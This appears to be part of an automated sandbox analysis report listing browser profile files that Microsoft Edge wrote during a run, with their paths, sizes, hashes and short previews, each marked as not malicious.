                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2206573698964425
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:PjOq2P923oH+TcwtzjqEKj0QMxIFUt8sGZZmw+sF7kwO923oH+TcwtzjqEKj0QMT:PKv4YebvqBZFUt8sGZ/+s95LYebvqBaJ
                                                                                                                                                                                                                                                                                    MD5:F8684610B383B7A1D8422571D1144686
                                                                                                                                                                                                                                                                                    SHA1:C48DD327742A41C76BA304D977AB9D4C33BB8ABB
                                                                                                                                                                                                                                                                                    SHA-256:CDFD3153999FAFB7AA55867354A6F788DF8C4DF4DCA386874F29E5495B1000B7
                                                                                                                                                                                                                                                                                    SHA-512:D2BC7DB2CE41FA94E0E2A4DC5D7ADFC3ABB7789BE2375F02BE1CCA4773BA61026EBF2617D92E04CEAD4D8A417024908A3C2E71486231428418CA221180BA9378
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:58:06.533 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:58:06.534 1a10 Recovering log #3.2024/12/23-00:58:06.537 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2206573698964425
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:PjOq2P923oH+TcwtzjqEKj0QMxIFUt8sGZZmw+sF7kwO923oH+TcwtzjqEKj0QMT:PKv4YebvqBZFUt8sGZ/+s95LYebvqBaJ
                                                                                                                                                                                                                                                                                    MD5:F8684610B383B7A1D8422571D1144686
                                                                                                                                                                                                                                                                                    SHA1:C48DD327742A41C76BA304D977AB9D4C33BB8ABB
                                                                                                                                                                                                                                                                                    SHA-256:CDFD3153999FAFB7AA55867354A6F788DF8C4DF4DCA386874F29E5495B1000B7
                                                                                                                                                                                                                                                                                    SHA-512:D2BC7DB2CE41FA94E0E2A4DC5D7ADFC3ABB7789BE2375F02BE1CCA4773BA61026EBF2617D92E04CEAD4D8A417024908A3C2E71486231428418CA221180BA9378
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:58:06.533 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:58:06.534 1a10 Recovering log #3.2024/12/23-00:58:06.537 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227297576861632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERrIq2P923oH+TcwtpIFUt8VRrZZmw+VRq97kwO923oH+Tcwta/WLJ:Zv4YebmFUt8R/+W75LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:C1AEFBDD7EAF54327E977CBF80E771C3
                                                                                                                                                                                                                                                                                    SHA1:A68F26B82FC115356435973578880425C56E47DF
                                                                                                                                                                                                                                                                                    SHA-256:047ABB6A934DF1363F436B4A91EB8781E3CF4EA2587BCFB11E34BA83DA239AC9
                                                                                                                                                                                                                                                                                    SHA-512:B5C42DEC054BD859E260DC4EB52FDF19E753F98D5060A731A24BDE6850838B783DB5AA5076DB864E2C0117711D5B0AF95E08F343406A099039CF06128A71AA4C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.795 660 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:57:47.795 660 Recovering log #3.2024/12/23-00:57:47.796 660 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227297576861632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERrIq2P923oH+TcwtpIFUt8VRrZZmw+VRq97kwO923oH+Tcwta/WLJ:Zv4YebmFUt8R/+W75LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:C1AEFBDD7EAF54327E977CBF80E771C3
                                                                                                                                                                                                                                                                                    SHA1:A68F26B82FC115356435973578880425C56E47DF
                                                                                                                                                                                                                                                                                    SHA-256:047ABB6A934DF1363F436B4A91EB8781E3CF4EA2587BCFB11E34BA83DA239AC9
                                                                                                                                                                                                                                                                                    SHA-512:B5C42DEC054BD859E260DC4EB52FDF19E753F98D5060A731A24BDE6850838B783DB5AA5076DB864E2C0117711D5B0AF95E08F343406A099039CF06128A71AA4C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.795 660 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:57:47.795 660 Recovering log #3.2024/12/23-00:57:47.796 660 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2654811564768635
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVum8:Bq+n0Jz9ELyKOMq+8y9/OwL
                                                                                                                                                                                                                                                                                    MD5:1012BC5ECA2D716479A2AD45476A6484
                                                                                                                                                                                                                                                                                    SHA1:8B892CAFB4DBD4C076E58944C83C35DABD77963C
                                                                                                                                                                                                                                                                                    SHA-256:6FEA184AC5ED232C6A0470A50C085E2FFED4F7ACEDF2D3A6D7B35CE8615BAB26
                                                                                                                                                                                                                                                                                    SHA-512:56A05CCAF4370BDF0B0D78CF07F1478646F3C98D2ACA0B0BCB19F599F2E8CC7CCDB867D9B95F4DC374A88F80C680DCA40FDC80D40154E6535FD2D5DCC18DB06F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4670794694983289
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0IV:v7doKsKuKZKlZNmu46yjx0G
                                                                                                                                                                                                                                                                                    MD5:31374BB7D10A46215EB86EC38E0FFC67
                                                                                                                                                                                                                                                                                    SHA1:A0535E52248CEA61DDBA611E03A075AC44E2DB35
                                                                                                                                                                                                                                                                                    SHA-256:EDE3B5DF9BAC7E06597B91D25B1BCE2046CC2204B765283510201BA47CA75004
                                                                                                                                                                                                                                                                                    SHA-512:93D17BAC2BC3DFC3918FCA2110FB3A0955A5506B3B32A2C1C9E2E71F4CBF6BC2B262EFB8014E8C1A23A9545176400A970BB6D882C5431C207D8ACFAF9208742B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bed7be42-bf6e-4fae-9634-db2b4e88131e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17676), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17676
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484352974260808
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6WflaTYw:sjOxuowfmvbG45xaTYw
                                                                                                                                                                                                                                                                                    MD5:8B362533A91E7AF4DFEF8A41D129ADCE
                                                                                                                                                                                                                                                                                    SHA1:856FAC2DFC581F83702FAE6C41319FE84586E1FB
                                                                                                                                                                                                                                                                                    SHA-256:06CB796870B4D87C71858C3A0FCCCDB8C21FA0411A2F3BACD062822CD9C138D1
                                                                                                                                                                                                                                                                                    SHA-512:77D5EE0B1C9247C862DACFE238ED2F2CED5F4172849F75E2D264C5627DAE01CD8FE595A21040A3E76E21C9975EC80F7A47B4580D475B38FAE5487ED6E2F23C6E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10194027286935615
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:+k38k3T5spEjVl/PnnnnnnnnnnnvoQ/Eou:+k38k3TaoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                    MD5:EB9EEE2D2CD7EC1300D8DF3F5FA68994
                                                                                                                                                                                                                                                                                    SHA1:AB57342CCA9BB967428DECF20CB1B7F321633239
                                                                                                                                                                                                                                                                                    SHA-256:D017A75B760CD054C74A15A99E1F252F3C3F16B9C907A966D87691047B944E1F
                                                                                                                                                                                                                                                                                    SHA-512:E739D52D5D591E22FD881406778842A5E5A2578985D307003535041C8DDE9789F0A6A08EFB0BC549A1F20BBA14CE30115116EDC496B0252DA400EEF554AB5421
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:..-.............M......."s.T.j...4..}......!.....-.............M......."s.T.j...4..}......!...........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8870037984674718
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G2ayFinyiEyRRyMtyLK5AykS6yDyEAy4inyhMcyx1I1Vyfvv82yYyIlyoy6vyCx6:/ak
                                                                                                                                                                                                                                                                                    MD5:B4A9DB98F2CE02ACF1B89D1C8AE4404D
                                                                                                                                                                                                                                                                                    SHA1:8C73D039FC56D87330997FD2532FB301493C6B4F
                                                                                                                                                                                                                                                                                    SHA-256:377149819D8A48D00CF2E2D96130F215913F4F911FFADCDC818168E126E3A226
                                                                                                                                                                                                                                                                                    SHA-512:6AE498264EED37F3CB3EE2E1C681DB63CC01E02F15791BCF52822997B9BF03429811FB30EB4B0F5F3C80A77E9FC5847909FA201355FD295FE51F75B170AE6445
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):628
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.236695485697315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:/XntM+iTl3sedhOKOuuuuuuuuuuuuuuuuuuuuuuu2PsedhOg:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuL8d
                                                                                                                                                                                                                                                                                    MD5:1B1EA4B81595C4CF0E00BD56BBF8C756
                                                                                                                                                                                                                                                                                    SHA1:FF31AD3C47DC66AD9345789E73BBA315A65A00B0
                                                                                                                                                                                                                                                                                    SHA-256:AAA0B94F9599F5EC35AE83187E33D5FC26A3531AF02459E6AA0E1A1925A9568F
                                                                                                                                                                                                                                                                                    SHA-512:497E206492CDC57B39F0D5BF1B69726A584CD024571BE2AC75FB35A7FC04EDC85A67E27DAF59B7E3F5D52881100D3AD7D638A402C47849376DD8762A5CBC1F14
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195018070104971
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdPuVoyq2P923oH+TcwtfrK+IFUt8VRdJD1Zmw+VRdJVRkwO923oH+TcwtfrUed:MVyv4Yeb23FUt85/+FR5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:BE4BA172462AA1DDCD83453084364C78
                                                                                                                                                                                                                                                                                    SHA1:E51DCAA34697CB5F83C1CA70C345E76B496CB5F7
                                                                                                                                                                                                                                                                                    SHA-256:F9ABA4B2E6548F73AAE103A63CDE31343CC963AA3BFEB7F105B2539AF22A8489
                                                                                                                                                                                                                                                                                    SHA-512:B6858F8897363FF21FC971D3499A2DA91F82F797A90789558017E01483E67CA3054A3683EC17262BCF77BB2C2E1EFF63F74C379338047174D63AA2F363EC2840
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.583 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:57:48.585 10a0 Recovering log #3.2024/12/23-00:57:48.585 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195018070104971
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdPuVoyq2P923oH+TcwtfrK+IFUt8VRdJD1Zmw+VRdJVRkwO923oH+TcwtfrUed:MVyv4Yeb23FUt85/+FR5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:BE4BA172462AA1DDCD83453084364C78
                                                                                                                                                                                                                                                                                    SHA1:E51DCAA34697CB5F83C1CA70C345E76B496CB5F7
                                                                                                                                                                                                                                                                                    SHA-256:F9ABA4B2E6548F73AAE103A63CDE31343CC963AA3BFEB7F105B2539AF22A8489
                                                                                                                                                                                                                                                                                    SHA-512:B6858F8897363FF21FC971D3499A2DA91F82F797A90789558017E01483E67CA3054A3683EC17262BCF77BB2C2E1EFF63F74C379338047174D63AA2F363EC2840
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.583 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:57:48.585 10a0 Recovering log #3.2024/12/23-00:57:48.585 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                    Malicious:false
